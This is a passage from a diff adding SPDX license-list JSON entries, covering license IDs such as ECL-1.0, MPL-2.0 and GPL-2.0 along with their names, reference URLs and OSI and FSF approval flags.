+ "http://plan9.bell-labs.com/plan9/license.html",
+ "https://opensource.org/licenses/LPL-1.02"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ECL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ECL-1.0.json",
+ "referenceNumber": 122,
+ "name": "Educational Community License v1.0",
+ "licenseId": "ECL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/ECL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0-no-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0-no-RFN.json",
+ "referenceNumber": 123,
+ "name": "SIL Open Font License 1.0 with no Reserved Font Name",
+ "licenseId": "OFL-1.0-no-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.json",
+ "referenceNumber": 124,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Germany",
+ "licenseId": "CC-BY-NC-SA-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0.json",
+ "referenceNumber": 125,
+ "name": "Creative Commons Attribution Share Alike 3.0 Unported",
+ "licenseId": "CC-BY-SA-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NTP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NTP.json",
+ "referenceNumber": 126,
+ "name": "NTP License",
+ "licenseId": "NTP",
+ "seeAlso": [
+ "https://opensource.org/licenses/NTP"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-2.0.json",
+ "referenceNumber": 127,
+ "name": "Mozilla Public License 2.0",
+ "licenseId": "MPL-2.0",
+ "seeAlso": [
+ "https://www.mozilla.org/MPL/2.0/",
+ "https://opensource.org/licenses/MPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.2.json",
+ "referenceNumber": 128,
+ "name": "Apple Public Source License 1.2",
+ "licenseId": "APSL-1.2",
+ "seeAlso": [
+ "http://www.samurajdata.se/opensource/mirror/licenses/apsl.php"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.json",
+ "referenceNumber": 129,
+ "name": "GNU Free Documentation License v1.2 only - no invariants",
+ "licenseId": "GFDL-1.2-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-2.0.json",
+ "referenceNumber": 130,
+ "name": "Artistic License 2.0",
+ "licenseId": "Artistic-2.0",
+ "seeAlso": [
+ "http://www.perlfoundation.org/artistic_license_2_0",
+ "https://www.perlfoundation.org/artistic-license-20.html",
+ "https://opensource.org/licenses/artistic-license-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0.json",
+ "referenceNumber": 131,
+ "name": "GNU General Public License v2.0 only",
+ "licenseId": "GPL-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/RSCPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RSCPL.json",
+ "referenceNumber": 132,
+ "name": "Ricoh Source Code Public License",
+ "licenseId": "RSCPL",
+ "seeAlso": [
+ "http://wayback.archive.org/web/20060715140826/http://www.risource.org/RPL/RPL-1.0A.shtml",
+ "https://opensource.org/licenses/RSCPL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sleepycat.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sleepycat.json",
+ "referenceNumber": 133,
+ "name": "Sleepycat License",
+ "licenseId": "Sleepycat",
+ "seeAlso": [
+ "https://opensource.org/licenses/Sleepycat"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/xpp.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/xpp.json",
+ "referenceNumber": 134,
+ "name": "XPP License",
+ "licenseId": "xpp",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/xpp"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Sharing-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Sharing-1.0.json",
+ "referenceNumber": 135,
+ "name": "Community Data License Agreement Sharing 1.0",
+ "licenseId": "CDLA-Sharing-1.0",
+ "seeAlso": [
+ "https://cdla.io/sharing-1-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ClArtistic.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ClArtistic.json",
+ "referenceNumber": 136,
+ "name": "Clarified Artistic License",
+ "licenseId": "ClArtistic",
+ "seeAlso": [
+ "http://gianluca.dellavedova.org/2011/01/03/clarified-artistic-license/",
+ "http://www.ncftp.com/ncftp/doc/LICENSE.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-only.json",
+ "referenceNumber": 137,
+ "name": "Affero General Public License v1.0 only",
+ "licenseId": "AGPL-1.0-only",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-DE.json",
+ "referenceNumber": 138,
+ "name": "Creative Commons Attribution 3.0 Germany",
+ "licenseId": "CC-BY-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-2.0.json",
+ "referenceNumber": 139,
+ "name": "Academic Free License v2.0",
+ "licenseId": "AFL-2.0",
+ "seeAlso": [
+ "http://wayback.archive.org/web/20060924134533/http://www.opensource.org/licenses/afl-2.0.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Intel.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Intel.json",
+ "referenceNumber": 140,
+ "name": "Intel Open Source License",
+ "licenseId": "Intel",
+ "seeAlso": [
+ "https://opensource.org/licenses/Intel"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.json",
+ "referenceNumber": 141,
+ "name": "GNU Free Documentation License v1.1 or later - no invariants",
+ "licenseId": "GFDL-1.1-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APAFML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APAFML.json",
+ "referenceNumber": 142,
+ "name": "Adobe Postscript AFM License",
+ "licenseId": "APAFML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AdobePostscriptAFM"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2.json",
+ "referenceNumber": 143,
+ "name": "GNU Free Documentation License v1.2",
+ "licenseId": "GFDL-1.2",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SISSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SISSL.json",
+ "referenceNumber": 144,
+ "name": "Sun Industry Standards Source License v1.1",
+ "licenseId": "SISSL",
+ "seeAlso": [
+ "http://www.openoffice.org/licenses/sissl_license.html",
+ "https://opensource.org/licenses/SISSL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Naumen.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Naumen.json",
+ "referenceNumber": 145,
+ "name": "Naumen Public License",
+ "licenseId": "Naumen",
+ "seeAlso": [
+ "https://opensource.org/licenses/Naumen"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/HTMLTIDY.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HTMLTIDY.json",
+ "referenceNumber": 146,
+ "name": "HTML Tidy License",
+ "licenseId": "HTMLTIDY",
+ "seeAlso": [
+ "https://github.com/htacg/tidy-html5/blob/next/README/LICENSE.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.8.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.8.json",
+ "referenceNumber": 147,
+ "name": "Open LDAP Public License v2.8",
+ "licenseId": "OLDAP-2.8",
+ "seeAlso": [
+ "http://www.openldap.org/software/release/license.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/blessing.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/blessing.json",
+ "referenceNumber": 148,
+ "name": "SQLite Blessing",
+ "licenseId": "blessing",
+ "seeAlso": [
+ "https://www.sqlite.org/src/artifact/e33a4df7e32d742a?ln\u003d4-9",
+ "https://sqlite.org/src/artifact/df5091916dbb40e6"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.0.json",
+ "referenceNumber": 149,
+ "name": "Creative Commons Attribution No Derivatives 2.0 Generic",
+ "licenseId": "CC-BY-ND-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGTSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGTSL.json",
+ "referenceNumber": 150,
+ "name": "Open Group Test Suite License",
+ "licenseId": "OGTSL",
+ "seeAlso": [
+ "http://www.opengroup.org/testing/downloads/The_Open_Group_TSL.txt",
+ "https://opensource.org/licenses/OGTSL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-or-later.json",
+ "referenceNumber": 151,
+ "name": "GNU Library General Public License v2 or later",
+ "licenseId": "LGPL-2.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Parity-7.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Parity-7.0.0.json",
+ "referenceNumber": 152,
+ "name": "The Parity Public License 7.0.0",
+ "licenseId": "Parity-7.0.0",
+ "seeAlso": [
+ "https://paritylicense.com/versions/7.0.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-1.0.json",
+ "referenceNumber": 153,
+ "name": "Creative Commons Attribution No Derivatives 1.0 Generic",
+ "licenseId": "CC-BY-ND-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/dvipdfm.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/dvipdfm.json",
+ "referenceNumber": 154,
+ "name": "dvipdfm License",
+ "licenseId": "dvipdfm",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/dvipdfm"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Python.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Python.json",
+ "referenceNumber": 155,
+ "name": "CNRI Python License",
+ "licenseId": "CNRI-Python",
+ "seeAlso": [
+ "https://opensource.org/licenses/CNRI-Python"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause-UC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-UC.json",
+ "referenceNumber": 156,
+ "name": "BSD-4-Clause (University of California-Specific)",
+ "licenseId": "BSD-4-Clause-UC",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLOD-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLOD-1.0.json",
+ "referenceNumber": 157,
+ "name": "Norwegian Licence for Open Government Data (NLOD) 1.0",
+ "licenseId": "NLOD-1.0",
+ "seeAlso": [
+ "http://data.norge.no/nlod/en/1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MS-RL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MS-RL.json",
+ "referenceNumber": 158,
+ "name": "Microsoft Reciprocal License",
+ "licenseId": "MS-RL",
+ "seeAlso": [
+ "http://www.microsoft.com/opensource/licenses.mspx",
+ "https://opensource.org/licenses/MS-RL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.json",
+ "referenceNumber": 159,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 4.0 International",
+ "licenseId": "CC-BY-NC-SA-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/HaskellReport.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HaskellReport.json",
+ "referenceNumber": 160,
+ "name": "Haskell Language Report License",
+ "licenseId": "HaskellReport",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Haskell_Language_Report_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-1.0.json",
+ "referenceNumber": 161,
+ "name": "Creative Commons Attribution 1.0 Generic",
+ "licenseId": "CC-BY-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/UCL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/UCL-1.0.json",
+ "referenceNumber": 162,
+ "name": "Upstream Compatibility License v1.0",
+ "licenseId": "UCL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/UCL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Mup.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Mup.json",
+ "referenceNumber": 163,
+ "name": "Mup License",
+ "licenseId": "Mup",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Mup"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SMPPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SMPPL.json",
+ "referenceNumber": 164,
+ "name": "Secure Messaging Protocol Public License",
+ "licenseId": "SMPPL",
+ "seeAlso": [
+ "https://github.com/dcblake/SMP/blob/master/Documentation/License.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PHP-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PHP-3.0.json",
+ "referenceNumber": 165,
+ "name": "PHP License v3.0",
+ "licenseId": "PHP-3.0",
+ "seeAlso": [
+ "http://www.php.net/license/3_0.txt",
+ "https://opensource.org/licenses/PHP-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GL2PS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GL2PS.json",
+ "referenceNumber": 166,
+ "name": "GL2PS License",
+ "licenseId": "GL2PS",
+ "seeAlso": [
+ "http://www.geuz.org/gl2ps/COPYING.GL2PS"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CrystalStacker.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CrystalStacker.json",
+ "referenceNumber": 167,
+ "name": "CrystalStacker License",
+ "licenseId": "CrystalStacker",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:CrystalStacker?rd\u003dLicensing/CrystalStacker"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C-20150513.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C-20150513.json",
+ "referenceNumber": 168,
+ "name": "W3C Software Notice and Document License (2015-05-13)",
+ "licenseId": "W3C-20150513",
+ "seeAlso": [
+ "https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NIST-PD-fallback.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NIST-PD-fallback.json",
+ "referenceNumber": 169,
+ "name": "NIST Public Domain Notice with license fallback",
+ "licenseId": "NIST-PD-fallback",
+ "seeAlso": [
+ "https://github.com/usnistgov/jsip/blob/59700e6926cbe96c5cdae897d9a7d2656b42abe3/LICENSE",
+ "https://github.com/usnistgov/fipy/blob/86aaa5c2ba2c6f1be19593c5986071cf6568cc34/LICENSE.rst"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-1.0.json",
+ "referenceNumber": 170,
+ "name": "Open Government Licence v1.0",
+ "licenseId": "OGL-UK-1.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/1/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPL-1.0.json",
+ "referenceNumber": 171,
+ "name": "Common Public License 1.0",
+ "licenseId": "CPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-only.json",
+ "referenceNumber": 172,
+ "name": "GNU Lesser General Public License v2.1 only",
+ "licenseId": "LGPL-2.1-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-2.0.json",
+ "referenceNumber": 173,
+ "name": "Zope Public License 2.0",
+ "licenseId": "ZPL-2.0",
+ "seeAlso": [
+ "http://old.zope.org/Resources/License/ZPL-2.0",
+ "https://opensource.org/licenses/ZPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Frameworx-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Frameworx-1.0.json",
+ "referenceNumber": 174,
+ "name": "Frameworx Open License 1.0",
+ "licenseId": "Frameworx-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Frameworx-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-only.json",
+ "referenceNumber": 175,
+ "name": "GNU Affero General Public License v3.0 only",
+ "licenseId": "AGPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/DRL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DRL-1.0.json",
+ "referenceNumber": 176,
+ "name": "Detection Rule License 1.0",
+ "licenseId": "DRL-1.0",
+ "seeAlso": [
+ "https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EFL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EFL-2.0.json",
+ "referenceNumber": 177,
+ "name": "Eiffel Forum License v2.0",
+ "licenseId": "EFL-2.0",
+ "seeAlso": [
+ "http://www.eiffel-nice.org/license/eiffel-forum-license-2.html",
+ "https://opensource.org/licenses/EFL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-99.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-99.json",
+ "referenceNumber": 178,
+ "name": "Spencer License 99",
+ "licenseId": "Spencer-99",
+ "seeAlso": [
+ "http://www.opensource.apple.com/source/tcl/tcl-5/tcl/generic/regfronts.c"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.json",
+ "referenceNumber": 179,
+ "name": "Cryptographic Autonomy License 1.0 (Combined Work Exception)",
+ "licenseId": "CAL-1.0-Combined-Work-Exception",
+ "seeAlso": [
+ "http://cryptographicautonomylicense.com/license-text.html",
+ "https://opensource.org/licenses/CAL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-only.json",
+ "referenceNumber": 180,
+ "name": "GNU Free Documentation License v1.1 only - invariants",
+ "licenseId": "GFDL-1.1-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TCL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TCL.json",
+ "referenceNumber": 181,
+ "name": "TCL/TK License",
+ "licenseId": "TCL",
+ "seeAlso": [
+ "http://www.tcl.tk/software/tcltk/license.html",
+ "https://fedoraproject.org/wiki/Licensing/TCL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SHL-0.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SHL-0.5.json",
+ "referenceNumber": 182,
+ "name": "Solderpad Hardware License v0.5",
+ "licenseId": "SHL-0.5",
+ "seeAlso": [
+ "https://solderpad.org/licenses/SHL-0.5/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0-RFN.json",
+ "referenceNumber": 183,
+ "name": "SIL Open Font License 1.0 with Reserved Font Name",
+ "licenseId": "OFL-1.0-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0.json",
+ "referenceNumber": 184,
+ "name": "GNU Library General Public License v2 only",
+ "licenseId": "LGPL-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-W-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-W-2.0.json",
+ "referenceNumber": 185,
+ "name": "CERN Open Hardware Licence Version 2 - Weakly Reciprocal",
+ "licenseId": "CERN-OHL-W-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Glide.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Glide.json",
+ "referenceNumber": 186,
+ "name": "3dfx Glide License",
+ "licenseId": "Glide",
+ "seeAlso": [
+ "http://www.users.on.net/~triforce/glidexp/COPYING.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/mpich2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/mpich2.json",
+ "referenceNumber": 187,
+ "name": "mpich2 License",
+ "licenseId": "mpich2",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/psutils.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/psutils.json",
+ "referenceNumber": 188,
+ "name": "psutils License",
+ "licenseId": "psutils",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/psutils"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SPL-1.0.json",
+ "referenceNumber": 189,
+ "name": "Sun Public License v1.0",
+ "licenseId": "SPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/SPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
